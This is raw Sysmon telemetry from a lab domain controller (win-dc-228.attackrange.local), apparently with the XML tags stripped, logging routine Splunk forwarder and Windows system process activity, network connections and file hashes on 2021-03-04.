13:51:53.808{5ABCFE62-843F-603E-3000-00000000AD01}2464C:\Windows\ADWS\Microsoft.ActiveDirectory.WebServices.exeNT AUTHORITY\SYSTEMtcptruetrue0:0:0:0:0:0:0:1win-dc-228.attackrange.local55096-true0:0:0:0:0:0:0:1win-dc-228.attackrange.local389ldap 23542300x80000000000000002200025Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:51:59.347{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=CBB9E052A15B0C1AE7C42419B1D49282,SHA256=3459993A6CBDDD6C3B53DE2FE4CB1BBDDBB674A9E7ECD66D176D327E1FBCFC3E,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000002200024Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:51:54.995{5ABCFE62-84AA-603E-D300-00000000AD01}3788C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-228.attackrange.local55097-false10.0.1.12-8000- 23542300x80000000000000002200027Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:52:00.644{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=E9103163DDB0EF0314AB4730E5D59E93,SHA256=4084F5524DF8342A691D60FA11C5A85C7AD5BF1D7229B7199CF381062072BDC4,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002200026Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:52:00.347{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=BB076D010B84908E6DCE7AE5B90073E9,SHA256=9D881FE70F6AE1D40E090D28F86CC3BFCD809DC1F4CDEE226B39DBFAA66B90C7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002200028Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:52:01.347{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=239B244694D5EE0FB2308841B98E95AD,SHA256=A377DB5C0E4C78BFCE65EF110328C266707BA258466474868E5561293D5B0E70,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002200038Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:52:02.659{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=1E68F0E4A07A3E675AFA7E9B9D7C1667,SHA256=17763937A0929AE23496A618C4ADA5FD71501C3AD6E12BFDB3210BA5FE9E1770,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000002200037Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:52:02.550{5ABCFE62-84A3-603E-A900-00000000AD01}49124704C:\Windows\system32\conhost.exe{5ABCFE62-E602-6040-CC4D-00000000AD01}6424C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002200036Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:52:02.550{5ABCFE62-842F-603E-0C00-00000000AD01}852384C:\Windows\system32\svchost.exe{5ABCFE62-843F-603E-2C00-00000000AD01}1764C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002200035Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:52:02.550{5ABCFE62-842F-603E-0C00-00000000AD01}852384C:\Windows\system32\svchost.exe{5ABCFE62-843F-603E-2C00-00000000AD01}1764C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002200034Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:52:02.550{5ABCFE62-842F-603E-0C00-00000000AD01}852384C:\Windows\system32\svchost.exe{5ABCFE62-843F-603E-2C00-00000000AD01}1764C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002200033Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:52:02.550{5ABCFE62-842F-603E-0C00-00000000AD01}852384C:\Windows\system32\svchost.exe{5ABCFE62-843F-603E-2C00-00000000AD01}1764C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002200032Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:52:02.550{5ABCFE62-842D-603E-0500-00000000AD01}416432C:\Windows\system32\csrss.exe{5ABCFE62-E602-6040-CC4D-00000000AD01}6424C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000002200031Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:52:02.550{5ABCFE62-84A2-603E-A500-00000000AD01}28764504C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{5ABCFE62-E602-6040-CC4D-00000000AD01}6424C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 154100x80000000000000002200030Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:52:02.551{5ABCFE62-E602-6040-CC4D-00000000AD01}6424C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe10.0.10011.16384SplunkMonNoHandle Control ProgramWindows (R) Win 7 DDK driverWindows (R) Win 7 DDK providerSplunkMonNoHandle.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{5ABCFE62-842D-603E-E703-000000000000}0x3e70SystemMD5=BF28C74E12839E40CD89696C7CB01573,SHA256=6187325F302F232DE582FE28E0E0D2B292AB8122C3356C9CE295A482D7B93EA3,IMPHASH=27776F2813155A6CF34F6A075A0C2EC8{5ABCFE62-84A2-603E-A500-00000000AD01}2876C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x80000000000000002200029Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:52:02.362{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C9512A7A23F1EF4012BDE41F45794B1F,SHA256=D3FAE8563C8CF4F9C6386999F9CFB22ADFB992175A3A1C15E177AEF9C12FBC5F,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000002200058Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:52:03.956{5ABCFE62-E603-6040-CE4D-00000000AD01}62205688C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe{5ABCFE62-84A2-603E-A500-00000000AD01}2876C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6025c5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6020f6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+59e67|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+5b88c|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+8e7d70|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002200057Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:52:03.831{5ABCFE62-84A3-603E-A900-00000000AD01}49124704C:\Windows\system32\conhost.exe{5ABCFE62-E603-6040-CE4D-00000000AD01}6220C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002200056Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:52:03.831{5ABCFE62-842F-603E-0C00-00000000AD01}852384C:\Windows\system32\svchost.exe{5ABCFE62-843F-603E-2C00-00000000AD01}1764C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002200055Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:52:03.831{5ABCFE62-842F-603E-0C00-00000000AD01}852384C:\Windows\system32\svchost.exe{5ABCFE62-843F-603E-2C00-00000000AD01}1764C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002200054Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:52:03.831{5ABCFE62-842F-603E-0C00-00000000AD01}852384C:\Windows\system32\svchost.exe{5ABCFE62-843F-603E-2C00-00000000AD01}1764C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002200053Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:52:03.831{5ABCFE62-842F-603E-0C00-00000000AD01}852384C:\Windows\system32\svchost.exe{5ABCFE62-843F-603E-2C00-00000000AD01}1764C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002200052Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:52:03.831{5ABCFE62-842D-603E-0500-00000000AD01}416340C:\Windows\system32\csrss.exe{5ABCFE62-E603-6040-CE4D-00000000AD01}6220C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000002200051Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:52:03.831{5ABCFE62-84A2-603E-A500-00000000AD01}28764504C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{5ABCFE62-E603-6040-CE4D-00000000AD01}6220C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 154100x80000000000000002200050Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:52:03.833{5ABCFE62-E603-6040-CE4D-00000000AD01}6220C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe8.0.2Active Directory monitorsplunk ApplicationSplunk Inc.splunk-admon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{5ABCFE62-842D-603E-E703-000000000000}0x3e70SystemMD5=947139F3BB2AB70CAF692A60C7A3A735,SHA256=940554A0170A70F634689CC84B00C51AC0BCF773C9639E1305E3672441FC85C8,IMPHASH=357CEC18833E7FF2ABFB722902B13165{5ABCFE62-84A2-603E-A500-00000000AD01}2876C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x80000000000000002200049Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:52:03.722{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=AB1A28FCC3E2358A0853E12B9F400B84,SHA256=4B8423339DB8ABC7C866AB6D645CA71521ED090133A0FF351737B1C1AFD69742,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000002200048Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:51:59.435{5ABCFE62-843F-603E-2E00-00000000AD01}2300C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-228.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-228.attackrange.local64664- 23542300x80000000000000002200047Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:52:03.362{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7221A8CDF0FC0AD4C28A5D13FEB2FEAE,SHA256=438D7792CDC767880E59560C9A8C89B2460189A3102B480BF09B292B92DCA528,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000002200046Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:52:03.222{5ABCFE62-84A3-603E-A900-00000000AD01}49124704C:\Windows\system32\conhost.exe{5ABCFE62-E603-6040-CD4D-00000000AD01}4452C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002200045Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:52:03.222{5ABCFE62-842F-603E-0C00-00000000AD01}852384C:\Windows\system32\svchost.exe{5ABCFE62-843F-603E-2C00-00000000AD01}1764C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002200044Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:52:03.222{5ABCFE62-842F-603E-0C00-00000000AD01}852384C:\Windows\system32\svchost.exe{5ABCFE62-843F-603E-2C00-00000000AD01}1764C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002200043Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:52:03.222{5ABCFE62-842F-603E-0C00-00000000AD01}852384C:\Windows\system32\svchost.exe{5ABCFE62-843F-603E-2C00-00000000AD01}1764C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002200042Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:52:03.222{5ABCFE62-842F-603E-0C00-00000000AD01}852384C:\Windows\system32\svchost.exe{5ABCFE62-843F-603E-2C00-00000000AD01}1764C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002200041Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:52:03.222{5ABCFE62-842D-603E-0500-00000000AD01}416532C:\Windows\system32\csrss.exe{5ABCFE62-E603-6040-CD4D-00000000AD01}4452C:\Program 